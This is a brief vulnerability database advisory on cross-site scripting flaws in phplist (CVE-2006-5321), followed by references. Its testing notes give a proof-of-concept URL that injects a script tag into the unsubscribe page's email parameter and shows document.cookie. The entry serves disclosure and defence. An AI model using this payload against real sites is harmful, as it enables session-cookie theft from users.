phplist Multiple Unspecified XSS

2006-10-12T00:00:00
ID OSVDB:36918
Type osvdb
Reporter OSVDB
Modified 2006-10-12T00:00:00

Description

Manual Testing Notes

http://[target]/phplist_path/?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Vendor Specific News/Changelog Entry: http://tincan.co.uk/?lid=1821 Other Advisory URL: http://www.phplist.com/news Other Advisory URL: http://websecurity.com.ua/267/ CVE-2006-5321 Bugtraq ID: 20483